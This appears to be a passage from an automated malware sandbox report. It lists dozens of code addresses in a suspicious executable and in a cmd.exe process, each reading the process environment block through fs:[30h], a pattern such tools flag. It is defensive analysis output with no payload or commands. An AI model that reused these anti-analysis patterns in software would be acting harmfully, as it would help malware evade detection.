          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C070D mov eax, dword ptr fs:[00000030h]2_2_015C070D
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152A70E mov eax, dword ptr fs:[00000030h]2_2_0152A70E
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152A70E mov eax, dword ptr fs:[00000030h]2_2_0152A70E
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F4F2E mov eax, dword ptr fs:[00000030h]2_2_014F4F2E
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F4F2E mov eax, dword ptr fs:[00000030h]2_2_014F4F2E
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152E730 mov eax, dword ptr fs:[00000030h]2_2_0152E730
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015337F5 mov eax, dword ptr fs:[00000030h]2_2_015337F5
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01577794 mov eax, dword ptr fs:[00000030h]2_2_01577794
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01577794 mov eax, dword ptr fs:[00000030h]2_2_01577794
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01577794 mov eax, dword ptr fs:[00000030h]2_2_01577794
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01508794 mov eax, dword ptr fs:[00000030h]2_2_01508794
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01507E41 mov eax, dword ptr fs:[00000030h]2_2_01507E41
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01507E41 mov eax, dword ptr fs:[00000030h]2_2_01507E41
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01507E41 mov eax, dword ptr fs:[00000030h]2_2_01507E41
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01507E41 mov eax, dword ptr fs:[00000030h]2_2_01507E41
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01507E41 mov eax, dword ptr fs:[00000030h]2_2_01507E41
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01507E41 mov eax, dword ptr fs:[00000030h]2_2_01507E41
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BAE44 mov eax, dword ptr fs:[00000030h]2_2_015BAE44
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BAE44 mov eax, dword ptr fs:[00000030h]2_2_015BAE44
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151AE73 mov eax, dword ptr fs:[00000030h]2_2_0151AE73
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151AE73 mov eax, dword ptr fs:[00000030h]2_2_0151AE73
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151AE73 mov eax, dword ptr fs:[00000030h]2_2_0151AE73
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151AE73 mov eax, dword ptr fs:[00000030h]2_2_0151AE73
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151AE73 mov eax, dword ptr fs:[00000030h]2_2_0151AE73
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150766D mov eax, dword ptr fs:[00000030h]2_2_0150766D
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152A61C mov eax, dword ptr fs:[00000030h]2_2_0152A61C
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152A61C mov eax, dword ptr fs:[00000030h]2_2_0152A61C
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FC600 mov eax, dword ptr fs:[00000030h]2_2_014FC600
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FC600 mov eax, dword ptr fs:[00000030h]2_2_014FC600
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FC600 mov eax, dword ptr fs:[00000030h]2_2_014FC600
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01528E00 mov eax, dword ptr fs:[00000030h]2_2_01528E00
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1608 mov eax, dword ptr fs:[00000030h]2_2_015B1608
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015AFE3F mov eax, dword ptr fs:[00000030h]2_2_015AFE3F
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FE620 mov eax, dword ptr fs:[00000030h]2_2_014FE620
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C8ED6 mov eax, dword ptr fs:[00000030h]2_2_015C8ED6
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01538EC7 mov eax, dword ptr fs:[00000030h]2_2_01538EC7
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015AFEC0 mov eax, dword ptr fs:[00000030h]2_2_015AFEC0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015236CC mov eax, dword ptr fs:[00000030h]2_2_015236CC
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015216E0 mov ecx, dword ptr fs:[00000030h]2_2_015216E0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015076E2 mov eax, dword ptr fs:[00000030h]2_2_015076E2
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0158FE87 mov eax, dword ptr fs:[00000030h]2_2_0158FE87
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015746A7 mov eax, dword ptr fs:[00000030h]2_2_015746A7
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C0EA5 mov eax, dword ptr fs:[00000030h]2_2_015C0EA5
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C0EA5 mov eax, dword ptr fs:[00000030h]2_2_015C0EA5
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C0EA5 mov eax, dword ptr fs:[00000030h]2_2_015C0EA5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002CB5E0 mov eax, dword ptr fs:[00000030h]4_2_002CB5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC2AE4 mov eax, dword ptr fs:[00000030h]4_2_02FC2AE4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305131B mov eax, dword ptr fs:[00000030h]4_2_0305131B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC2ACB mov eax, dword ptr fs:[00000030h]4_2_02FC2ACB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAAAB0 mov eax, dword ptr fs:[00000030h]4_2_02FAAAB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAAAB0 mov eax, dword ptr fs:[00000030h]4_2_02FAAAB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCFAB0 mov eax, dword ptr fs:[00000030h]4_2_02FCFAB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F952A5 mov eax, dword ptr fs:[00000030h]4_2_02F952A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F952A5 mov eax, dword ptr fs:[00000030h]4_2_02F952A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F952A5 mov eax, dword ptr fs:[00000030h]4_2_02F952A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F952A5 mov eax, dword ptr fs:[00000030h]4_2_02F952A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F952A5 mov eax, dword ptr fs:[00000030h]4_2_02F952A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03068B58 mov eax, dword ptr fs:[00000030h]4_2_03068B58
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCD294 mov eax, dword ptr fs:[00000030h]4_2_02FCD294
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCD294 mov eax, dword ptr fs:[00000030h]4_2_02FCD294
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0304D380 mov ecx, dword ptr fs:[00000030h]4_2_0304D380
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD927A mov eax, dword ptr fs:[00000030h]4_2_02FD927A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305138A mov eax, dword ptr fs:[00000030h]4_2_0305138A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03065BA5 mov eax, dword ptr fs:[00000030h]4_2_03065BA5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99240 mov eax, dword ptr fs:[00000030h]4_2_02F99240
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99240 mov eax, dword ptr fs:[00000030h]4_2_02F99240
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99240 mov eax, dword ptr fs:[00000030h]4_2_02F99240
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99240 mov eax, dword ptr fs:[00000030h]4_2_02F99240
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030153CA mov eax, dword ptr fs:[00000030h]4_2_030153CA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030153CA mov eax, dword ptr fs:[00000030h]4_2_030153CA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD4A2C mov eax, dword ptr fs:[00000030h]4_2_02FD4A2C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD4A2C mov eax, dword ptr fs:[00000030h]4_2_02FD4A2C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB3A1C mov eax, dword ptr fs:[00000030h]4_2_02FB3A1C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F95210 mov eax, dword ptr fs:[00000030h]4_2_02F95210
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F95210 mov ecx, dword ptr fs:[00000030h]4_2_02F95210
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F95210 mov eax, dword ptr fs:[00000030h]4_2_02F95210
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F95210 mov eax, dword ptr fs:[00000030h]4_2_02F95210
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9AA16 mov eax, dword ptr fs:[00000030h]4_2_02F9AA16
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9AA16 mov eax, dword ptr fs:[00000030h]4_2_02F9AA16
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA8A0A mov eax, dword ptr fs:[00000030h]4_2_02FA8A0A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBDBE9 mov eax, dword ptr fs:[00000030h]4_2_02FBDBE9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305AA16 mov eax, dword ptr fs:[00000030h]4_2_0305AA16
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305AA16 mov eax, dword ptr fs:[00000030h]4_2_0305AA16
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC03E2 mov eax, dword ptr fs:[00000030h]4_2_02FC03E2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC03E2 mov eax, dword ptr fs:[00000030h]4_2_02FC03E2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC03E2 mov eax, dword ptr fs:[00000030h]4_2_02FC03E2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC03E2 mov eax, dword ptr fs:[00000030h]4_2_02FC03E2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC03E2 mov eax, dword ptr fs:[00000030h]4_2_02FC03E2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC03E2 mov eax, dword ptr fs:[00000030h]4_2_02FC03E2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305EA55 mov eax, dword ptr fs:[00000030h]4_2_0305EA55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC4BAD mov eax, dword ptr fs:[00000030h]4_2_02FC4BAD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC4BAD mov eax, dword ptr fs:[00000030h]4_2_02FC4BAD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC4BAD mov eax, dword ptr fs:[00000030h]4_2_02FC4BAD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03024257 mov eax, dword ptr fs:[00000030h]4_2_03024257
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0304B260 mov eax, dword ptr fs:[00000030h]4_2_0304B260
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0304B260 mov eax, dword ptr fs:[00000030h]4_2_0304B260
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03068A62 mov eax, dword ptr fs:[00000030h]4_2_03068A62
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC2397 mov eax, dword ptr fs:[00000030h]4_2_02FC2397
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCB390 mov eax, dword ptr fs:[00000030h]4_2_02FCB390
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA1B8F mov eax, dword ptr fs:[00000030h]4_2_02FA1B8F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA1B8F mov eax, dword ptr fs:[00000030h]4_2_02FA1B8F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC3B7A mov eax, dword ptr fs:[00000030h]4_2_02FC3B7A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC3B7A mov eax, dword ptr fs:[00000030h]4_2_02FC3B7A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9DB60 mov ecx, dword ptr fs:[00000030h]4_2_02F9DB60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9F358 mov eax, dword ptr fs:[00000030h]4_2_02F9F358
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9DB40 mov eax, dword ptr fs:[00000030h]4_2_02F9DB40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F958EC mov eax, dword ptr fs:[00000030h]4_2_02F958EC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F940E1 mov eax, dword ptr fs:[00000030h]4_2_02F940E1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F940E1 mov eax, dword ptr fs:[00000030h]4_2_02F940E1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F940E1 mov eax, dword ptr fs:[00000030h]4_2_02F940E1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCF0BF mov ecx, dword ptr fs:[00000030h]4_2_02FCF0BF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCF0BF mov eax, dword ptr fs:[00000030h]4_2_02FCF0BF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCF0BF mov eax, dword ptr fs:[00000030h]4_2_02FCF0BF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD90AF mov eax, dword ptr fs:[00000030h]4_2_02FD90AF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A0 mov eax, dword ptr fs:[00000030h]4_2_02FC20A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A0 mov eax, dword ptr fs:[00000030h]4_2_02FC20A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A0 mov eax, dword ptr fs:[00000030h]4_2_02FC20A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A0 mov eax, dword ptr fs:[00000030h]4_2_02FC20A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A0 mov eax, dword ptr fs:[00000030h]4_2_02FC20A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A0 mov eax, dword ptr fs:[00000030h]4_2_02FC20A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99080 mov eax, dword ptr fs:[00000030h]4_2_02F99080
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030549A4 mov eax, dword ptr fs:[00000030h]4_2_030549A4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030549A4 mov eax, dword ptr fs:[00000030h]4_2_030549A4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030549A4 mov eax, dword ptr fs:[00000030h]4_2_030549A4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030549A4 mov eax, dword ptr fs:[00000030h]4_2_030549A4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030169A6 mov eax, dword ptr fs:[00000030h]4_2_030169A6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB0050 mov eax, dword ptr fs:[00000030h]4_2_02FB0050
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB0050 mov eax, dword ptr fs:[00000030h]4_2_02FB0050
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030151BE mov eax, dword ptr fs:[00000030h]4_2_030151BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030151BE mov eax, dword ptr fs:[00000030h]4_2_030151BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030151BE mov eax, dword ptr fs:[00000030h]4_2_030151BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030151BE mov eax, dword ptr fs:[00000030h]4_2_030151BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAB02A mov eax, dword ptr fs:[00000030h]4_2_02FAB02A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAB02A mov eax, dword ptr fs:[00000030h]4_2_02FAB02A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAB02A mov eax, dword ptr fs:[00000030h]4_2_02FAB02A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAB02A mov eax, dword ptr fs:[00000030h]4_2_02FAB02A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC002D mov eax, dword ptr fs:[00000030h]4_2_02FC002D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC002D mov eax, dword ptr fs:[00000030h]4_2_02FC002D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC002D mov eax, dword ptr fs:[00000030h]4_2_02FC002D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC002D mov eax, dword ptr fs:[00000030h]4_2_02FC002D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC002D mov eax, dword ptr fs:[00000030h]4_2_02FC002D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030241E8 mov eax, dword ptr fs:[00000030h]4_2_030241E8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03064015 mov eax, dword ptr fs:[00000030h]4_2_03064015
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03064015 mov eax, dword ptr fs:[00000030h]4_2_03064015
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03017016 mov eax, dword ptr fs:[00000030h]4_2_03017016
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03017016 mov eax, dword ptr fs:[00000030h]4_2_03017016
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03017016 mov eax, dword ptr fs:[00000030h]4_2_03017016
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9B1E1 mov eax, dword ptr fs:[00000030h]4_2_02F9B1E1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9B1E1 mov eax, dword ptr fs:[00000030h]4_2_02F9B1E1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9B1E1 mov eax, dword ptr fs:[00000030h]4_2_02F9B1E1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC61A0 mov eax, dword ptr fs:[00000030h]4_2_02FC61A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC61A0 mov eax, dword ptr fs:[00000030h]4_2_02FC61A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC2990 mov eax, dword ptr fs:[00000030h]4_2_02FC2990
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03061074 mov eax, dword ptr fs:[00000030h]4_2_03061074
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03052073 mov eax, dword ptr fs:[00000030h]4_2_03052073
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBC182 mov eax, dword ptr fs:[00000030h]4_2_02FBC182
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCA185 mov eax, dword ptr fs:[00000030h]4_2_02FCA185
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03013884 mov eax, dword ptr fs:[00000030h]4_2_03013884
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03013884 mov eax, dword ptr fs:[00000030h]4_2_03013884
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9B171 mov eax, dword ptr fs:[00000030h]4_2_02F9B171
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9B171 mov eax, dword ptr fs:[00000030h]4_2_02F9B171
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9C962 mov eax, dword ptr fs:[00000030h]4_2_02F9C962
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBB944 mov eax, dword ptr fs:[00000030h]4_2_02FBB944
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBB944 mov eax, dword ptr fs:[00000030h]4_2_02FBB944
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC513A mov eax, dword ptr fs:[00000030h]4_2_02FC513A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC513A mov eax, dword ptr fs:[00000030h]4_2_02FC513A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302B8D0 mov eax, dword ptr fs:[00000030h]4_2_0302B8D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302B8D0 mov ecx, dword ptr fs:[00000030h]4_2_0302B8D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302B8D0 mov eax, dword ptr fs:[00000030h]4_2_0302B8D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302B8D0 mov eax, dword ptr fs:[00000030h]4_2_0302B8D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302B8D0 mov eax, dword ptr fs:[00000030h]4_2_0302B8D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302B8D0 mov eax, dword ptr fs:[00000030h]4_2_0302B8D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB4120 mov eax, dword ptr fs:[00000030h]4_2_02FB4120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB4120 mov eax, dword ptr fs:[00000030h]4_2_02FB4120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB4120 mov eax, dword ptr fs:[00000030h]4_2_02FB4120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB4120 mov eax, dword ptr fs:[00000030h]4_2_02FB4120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB4120 mov ecx, dword ptr fs:[00000030h]4_2_02FB4120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99100 mov eax, dword ptr fs:[00000030h]4_2_02F99100
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99100 mov eax, dword ptr fs:[00000030h]4_2_02F99100
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99100 mov eax, dword ptr fs:[00000030h]4_2_02F99100
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306070D mov eax, dword ptr fs:[00000030h]4_2_0306070D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306070D mov eax, dword ptr fs:[00000030h]4_2_0306070D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302FF10 mov eax, dword ptr fs:[00000030h]4_2_0302FF10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302FF10 mov eax, dword ptr fs:[00000030h]4_2_0302FF10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA76E2 mov eax, dword ptr fs:[00000030h]4_2_02FA76E2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC16E0 mov ecx, dword ptr fs:[00000030h]4_2_02FC16E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC36CC mov eax, dword ptr fs:[00000030h]4_2_02FC36CC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD8EC7 mov eax, dword ptr fs:[00000030h]4_2_02FD8EC7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03068F6A mov eax, dword ptr fs:[00000030h]4_2_03068F6A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBAE73 mov eax, dword ptr fs:[00000030h]4_2_02FBAE73
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBAE73 mov eax, dword ptr fs:[00000030h]4_2_02FBAE73
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBAE73 mov eax, dword ptr fs:[00000030h]4_2_02FBAE73
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBAE73 mov eax, dword ptr fs:[00000030h]4_2_02FBAE73
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBAE73 mov eax, dword ptr fs:[00000030h]4_2_02FBAE73
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03017794 mov eax, dword ptr fs:[00000030h]4_2_03017794
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03017794 mov eax, dword ptr fs:[00000030h]4_2_03017794
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03017794 mov eax, dword ptr fs:[00000030h]4_2_03017794
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA766D mov eax, dword ptr fs:[00000030h]4_2_02FA766D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA7E41 mov eax, dword ptr fs:[00000030h]4_2_02FA7E41
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA7E41 mov eax, dword ptr fs:[00000030h]4_2_02FA7E41
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA7E41 mov eax, dword ptr fs:[00000030h]4_2_02FA7E41
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA7E41 mov eax, dword ptr fs:[00000030h]4_2_02FA7E41
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA7E41 mov eax, dword ptr fs:[00000030h]4_2_02FA7E41
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA7E41 mov eax, dword ptr fs:[00000030h]4_2_02FA7E41
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9E620 mov eax, dword ptr fs:[00000030h]4_2_02F9E620
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCA61C mov eax, dword ptr fs:[00000030h]4_2_02FCA61C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCA61C mov eax, dword ptr fs:[00000030h]4_2_02FCA61C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9C600 mov eax, dword ptr fs:[00000030h]4_2_02F9C600
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9C600 mov eax, dword ptr fs:[00000030h]4_2_02F9C600
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9C600 mov eax, dword ptr fs:[00000030h]4_2_02F9C600
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC8E00 mov eax, dword ptr fs:[00000030h]4_2_02FC8E00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD37F5 mov eax, dword ptr fs:[00000030h]4_2_02FD37F5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051608 mov eax, dword ptr fs:[00000030h]4_2_03051608
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0304FE3F mov eax, dword ptr fs:[00000030h]4_2_0304FE3F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305AE44 mov eax, dword ptr fs:[00000030h]4_2_0305AE44
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305AE44 mov eax, dword ptr fs:[00000030h]4_2_0305AE44
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA8794 mov eax, dword ptr fs:[00000030h]4_2_02FA8794
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302FE87 mov eax, dword ptr fs:[00000030h]4_2_0302FE87
